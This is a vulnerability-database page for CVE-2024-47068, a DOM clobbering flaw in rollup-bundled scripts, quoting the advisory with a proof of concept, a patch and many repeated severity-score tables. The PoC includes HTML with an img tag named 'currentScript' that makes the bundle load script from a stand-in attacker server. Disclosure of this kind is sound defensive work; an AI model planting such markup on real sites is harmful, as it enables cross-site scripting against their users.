VulnerableCode Vulnerability Details

Staging Environment: Content and features may be unstable or change without notice.

Search for vulnerabilities

Vulnerability details: VCID-g7ew-qdyk-kug1

Essentials
Severities (49)
References (16)
Severity details (34)
Exploits (0)
EPSS
History (1)

Vulnerability ID	VCID-g7ew-qdyk-kug1
Aliases	CVE-2024-47068 GHSA-gcx4-mw62-g8wm
Summary	DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS ### Summary We discovered a DOM Clobbering vulnerability in rollup when bundling scripts that use `import.meta.url` or with plugins that emit and reference asset files from code in `cjs`/`umd`/`iife` format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. It's worth noting that we’ve identifed similar issues in other popular bundlers like Webpack ([CVE-2024-43788](https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986)), which might serve as a good reference. ### Details #### Backgrounds DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references: [1] https://scnps.co/papers/sp23_domclob.pdf [2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/ #### Gadget found in `rollup` We have identified a DOM Clobbering vulnerability in `rollup` bundled scripts, particularly when the scripts uses `import.meta` and set output in format of `cjs`/`umd`/`iife`. In such cases, `rollup` replaces meta property with the URL retrieved from `document.currentScript`. https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162 https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185 However, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the `src` attribute of the attacker-controlled element (e.g., an `img` tag ) is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server. ### PoC Considering a website that contains the following `main.js` script, the devloper decides to use the `rollup` to bundle up the program: `rollup main.js --format cjs --file bundle.js`. ``` var s = document.createElement('script') s.src = import.meta.url + 'extra.js' document.head.append(s) ``` The output `bundle.js` is shown in the following code snippet. ``` 'use strict'; var _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null; var s = document.createElement('script'); s.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript && False && _documentCurrentScript.src \|\| new URL('bundle.js', document.baseURI).href)) + 'extra.js'; document.head.append(s); ``` Adding the `rollup` bundled script, `bundle.js`, as part of the web page source code, the page could load the `extra.js` file from the attacker's domain, `attacker.controlled.server` due to the introduced gadget during bundling. The attacker only needs to insert an `img` tag with the name attribute set to `currentScript`. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page. ``` <!DOCTYPE html> <html> <head> <title>rollup Example</title> <!-- Attacker-controlled Script-less HTML Element starts--!> <img name="currentScript" src="https://attacker.controlled.server/"></img> <!-- Attacker-controlled Script-less HTML Element ends--!> </head> <script type="module" crossorigin src="bundle.js"></script> <body> </body> </html> ``` ### Impact This vulnerability can result in cross-site scripting (XSS) attacks on websites that include rollup-bundled files (configured with an output format of `cjs`, `iife`, or `umd` and use `import.meta`) and allow users to inject certain scriptless HTML tags without properly sanitizing the `name` or `id` attributes. ### Patch Patching the following two functions with type checking would be effective mitigations against DOM Clobbering attack. ``` const getRelativeUrlFromDocument = (relativePath: string, umd = false) => getResolveUrl( `'${escapeId(relativePath)}', ${ umd ? `typeof document === 'undefined' ? location.href : ` : '' }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src \|\| document.baseURI` ); ``` ``` const getUrlFromDocument = (chunkId: string, umd = false) => `${ umd ? `typeof document === 'undefined' ? location.href : ` : '' }(${DOCUMENT_CURRENT_SCRIPT} && ${DOCUMENT_CURRENT_SCRIPT}.tagName.toUpperCase() === 'SCRIPT' &&${DOCUMENT_CURRENT_SCRIPT}.src \|\| new URL('${escapeId( chunkId )}', document.baseURI).href)`; ```
Status	Published
Exploitability	0.5
Weighted Severity	8.0
Risk	4.0
Affected and Fixed Packages	Package Details

Weaknesses (3)

CWE-79	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE-937	OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities
CWE-1035	OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

System	Score	Found at
cvssv3	6.4	https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-47068.json
epss	0.02837	https://api.first.org/data/v1/epss?cve=CVE-2024-47068
epss	0.02837	https://api.first.org/data/v1/epss?cve=CVE-2024-47068
epss	0.02837	https://api.first.org/data/v1/epss?cve=CVE-2024-47068
epss	0.02837	https://api.first.org/data/v1/epss?cve=CVE-2024-47068
epss	0.02837	https://api.first.org/data/v1/epss?cve=CVE-2024-47068
epss	0.02837	https://api.first.org/data/v1/epss?cve=CVE-2024-47068
epss	0.02837	https://api.first.org/data/v1/epss?cve=CVE-2024-47068
epss	0.02837	https://api.first.org/data/v1/epss?cve=CVE-2024-47068
epss	0.02837	https://api.first.org/data/v1/epss?cve=CVE-2024-47068
epss	0.02837	https://api.first.org/data/v1/epss?cve=CVE-2024-47068
epss	0.02837	https://api.first.org/data/v1/epss?cve=CVE-2024-47068
epss	0.02837	https://api.first.org/data/v1/epss?cve=CVE-2024-47068
epss	0.02837	https://api.first.org/data/v1/epss?cve=CVE-2024-47068
epss	0.02837	https://api.first.org/data/v1/epss?cve=CVE-2024-47068
epss	0.02837	https://api.first.org/data/v1/epss?cve=CVE-2024-47068
cvssv3.1_qr	HIGH	https://github.com/advisories/GHSA-gcx4-mw62-g8wm
cvssv3.1	6.4	https://github.com/rollup/rollup
cvssv4	8.3	https://github.com/rollup/rollup
generic_textual	HIGH	https://github.com/rollup/rollup
cvssv3.1	6.1	https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162
cvssv3.1	6.4	https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162
cvssv4	8.3	https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162
generic_textual	HIGH	https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162
ssvc	Track	https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162
cvssv3.1	6.1	https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185
cvssv3.1	6.4	https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185
cvssv4	8.3	https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185
generic_textual	HIGH	https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185
ssvc	Track	https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185
cvssv3.1	6.1	https://github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4
cvssv3.1	6.4	https://github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4
cvssv4	8.3	https://github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4
generic_textual	HIGH	https://github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4
ssvc	Track	https://github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4
cvssv3.1	6.1	https://github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541
cvssv3.1	6.4	https://github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541
cvssv4	8.3	https://github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541
generic_textual	HIGH	https://github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541
ssvc	Track	https://github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541
cvssv3.1	6.1	https://github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm
cvssv3.1	6.4	https://github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm
cvssv3.1_qr	HIGH	https://github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm
cvssv4	8.3	https://github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm
generic_textual	HIGH	https://github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm
ssvc	Track	https://github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm
cvssv3.1	6.4	https://nvd.nist.gov/vuln/detail/CVE-2024-47068
cvssv4	8.3	https://nvd.nist.gov/vuln/detail/CVE-2024-47068
generic_textual	HIGH	https://nvd.nist.gov/vuln/detail/CVE-2024-47068

Reference id	Reference type	URL
		https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-47068.json
		https://api.first.org/data/v1/epss?cve=CVE-2024-47068
		https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47068
		https://github.com/rollup/rollup
		https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162
		https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185
		https://github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4
		https://github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541
		https://github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm
		https://nvd.nist.gov/vuln/detail/CVE-2024-47068
1082712		https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1082712
2314249		https://bugzilla.redhat.com/show_bug.cgi?id=2314249
GHSA-gcx4-mw62-g8wm		https://github.com/advisories/GHSA-gcx4-mw62-g8wm
RHSA-2024:10917		https://access.redhat.com/errata/RHSA-2024:10917
RHSA-2024:10962		https://access.redhat.com/errata/RHSA-2024:10962
RHSA-2025:3374		https://access.redhat.com/errata/RHSA-2025:3374

No exploits are available.

Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H Found at https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-47068.json

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H Found at https://github.com/rollup/rollup

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N Found at https://github.com/rollup/rollup

Attack Vector (AV)	Attack Complexity (AC)	Attack Requirements (AT)	Privileges Required (PR)	User Interaction (UI)	Vulnerable System Impact Confidentiality (VC)	Vulnerable System Impact Integrity (VI)	Vulnerable System Impact Availability (VA)	Subsequent System Impact Confidentiality (SC)	Subsequent System Impact Integrity (SI)	Subsequent System Impact Availability (SA)
network adjacent local physical	low high	none present	none low high	none passive active	high low none	high low none	high low none	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Attack Requirements (AT)

Privileges Required (PR)

User Interaction (UI)

Vulnerable System Impact Confidentiality (VC)

Vulnerable System Impact Integrity (VI)

Vulnerable System Impact Availability (VA)

Subsequent System Impact Confidentiality (SC)

Subsequent System Impact Integrity (SI)

Subsequent System Impact Availability (SA)

network

adjacent

local

physical

low

high

none

present

none

low

high

none

passive

active

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Found at https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H Found at https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N Found at https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162

Attack Vector (AV)	Attack Complexity (AC)	Attack Requirements (AT)	Privileges Required (PR)	User Interaction (UI)	Vulnerable System Impact Confidentiality (VC)	Vulnerable System Impact Integrity (VI)	Vulnerable System Impact Availability (VA)	Subsequent System Impact Confidentiality (SC)	Subsequent System Impact Integrity (SI)	Subsequent System Impact Availability (SA)
network adjacent local physical	low high	none present	none low high	none passive active	high low none	high low none	high low none	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Attack Requirements (AT)

Privileges Required (PR)

User Interaction (UI)

Vulnerable System Impact Confidentiality (VC)

Vulnerable System Impact Integrity (VI)

Vulnerable System Impact Availability (VA)

Subsequent System Impact Confidentiality (SC)

Subsequent System Impact Integrity (SI)

Subsequent System Impact Availability (SA)

network

adjacent

local

physical

low

high

none

present

none

low

high

none

passive

active

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

Vector: SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-23T15:47:09Z/ Found at https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Found at https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H Found at https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N Found at https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185

Attack Vector (AV)	Attack Complexity (AC)	Attack Requirements (AT)	Privileges Required (PR)	User Interaction (UI)	Vulnerable System Impact Confidentiality (VC)	Vulnerable System Impact Integrity (VI)	Vulnerable System Impact Availability (VA)	Subsequent System Impact Confidentiality (SC)	Subsequent System Impact Integrity (SI)	Subsequent System Impact Availability (SA)
network adjacent local physical	low high	none present	none low high	none passive active	high low none	high low none	high low none	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Attack Requirements (AT)

Privileges Required (PR)

User Interaction (UI)

Vulnerable System Impact Confidentiality (VC)

Vulnerable System Impact Integrity (VI)

Vulnerable System Impact Availability (VA)

Subsequent System Impact Confidentiality (SC)

Subsequent System Impact Integrity (SI)

Subsequent System Impact Availability (SA)

network

adjacent

local

physical

low

high

none

present

none

low

high

none

passive

active

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

Vector: SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-23T15:47:09Z/ Found at https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Found at https://github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H Found at https://github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N Found at https://github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4

Attack Vector (AV)	Attack Complexity (AC)	Attack Requirements (AT)	Privileges Required (PR)	User Interaction (UI)	Vulnerable System Impact Confidentiality (VC)	Vulnerable System Impact Integrity (VI)	Vulnerable System Impact Availability (VA)	Subsequent System Impact Confidentiality (SC)	Subsequent System Impact Integrity (SI)	Subsequent System Impact Availability (SA)
network adjacent local physical	low high	none present	none low high	none passive active	high low none	high low none	high low none	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Attack Requirements (AT)

Privileges Required (PR)

User Interaction (UI)

Vulnerable System Impact Confidentiality (VC)

Vulnerable System Impact Integrity (VI)

Vulnerable System Impact Availability (VA)

Subsequent System Impact Confidentiality (SC)

Subsequent System Impact Integrity (SI)

Subsequent System Impact Availability (SA)

network

adjacent

local

physical

low

high

none

present

none

low

high

none

passive

active

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

Vector: SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-23T15:47:09Z/ Found at https://github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Found at https://github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H Found at https://github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N Found at https://github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541

Attack Vector (AV)	Attack Complexity (AC)	Attack Requirements (AT)	Privileges Required (PR)	User Interaction (UI)	Vulnerable System Impact Confidentiality (VC)	Vulnerable System Impact Integrity (VI)	Vulnerable System Impact Availability (VA)	Subsequent System Impact Confidentiality (SC)	Subsequent System Impact Integrity (SI)	Subsequent System Impact Availability (SA)
network adjacent local physical	low high	none present	none low high	none passive active	high low none	high low none	high low none	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Attack Requirements (AT)

Privileges Required (PR)

User Interaction (UI)

Vulnerable System Impact Confidentiality (VC)

Vulnerable System Impact Integrity (VI)

Vulnerable System Impact Availability (VA)

Subsequent System Impact Confidentiality (SC)

Subsequent System Impact Integrity (SI)

Subsequent System Impact Availability (SA)

network

adjacent

local

physical

low

high

none

present

none

low

high

none

passive

active

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

Vector: SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-23T15:47:09Z/ Found at https://github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Found at https://github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H Found at https://github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N Found at https://github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm

Attack Vector (AV)	Attack Complexity (AC)	Attack Requirements (AT)	Privileges Required (PR)	User Interaction (UI)	Vulnerable System Impact Confidentiality (VC)	Vulnerable System Impact Integrity (VI)	Vulnerable System Impact Availability (VA)	Subsequent System Impact Confidentiality (SC)	Subsequent System Impact Integrity (SI)	Subsequent System Impact Availability (SA)
network adjacent local physical	low high	none present	none low high	none passive active	high low none	high low none	high low none	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Attack Requirements (AT)

Privileges Required (PR)

User Interaction (UI)

Vulnerable System Impact Confidentiality (VC)

Vulnerable System Impact Integrity (VI)

Vulnerable System Impact Availability (VA)

Subsequent System Impact Confidentiality (SC)

Subsequent System Impact Integrity (SI)

Subsequent System Impact Availability (SA)

network

adjacent

local

physical

low

high

none

present

none

low

high

none

passive

active

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

Vector: SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-23T15:47:09Z/ Found at https://github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm

Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H Found at https://nvd.nist.gov/vuln/detail/CVE-2024-47068

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N Found at https://nvd.nist.gov/vuln/detail/CVE-2024-47068

Attack Vector (AV)	Attack Complexity (AC)	Attack Requirements (AT)	Privileges Required (PR)	User Interaction (UI)	Vulnerable System Impact Confidentiality (VC)	Vulnerable System Impact Integrity (VI)	Vulnerable System Impact Availability (VA)	Subsequent System Impact Confidentiality (SC)	Subsequent System Impact Integrity (SI)	Subsequent System Impact Availability (SA)
network adjacent local physical	low high	none present	none low high	none passive active	high low none	high low none	high low none	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Attack Requirements (AT)

Privileges Required (PR)

User Interaction (UI)

Vulnerable System Impact Confidentiality (VC)

Vulnerable System Impact Integrity (VI)

Vulnerable System Impact Availability (VA)

Subsequent System Impact Confidentiality (SC)

Subsequent System Impact Integrity (SI)

Subsequent System Impact Availability (SA)

network

adjacent

local

physical

low

high

none

present

none

low

high

none

passive

active

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

Exploit Prediction Scoring System (EPSS)

Percentile	0.86135
EPSS Score	0.02837
Published At	April 2, 2026, 12:55 p.m.

Date	Actor	Action	Source	VulnerableCode Version
2026-04-01T12:49:42.909543+00:00	GithubOSV Importer	Import	https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-gcx4-mw62-g8wm/GHSA-gcx4-mw62-g8wm.json	38.0.0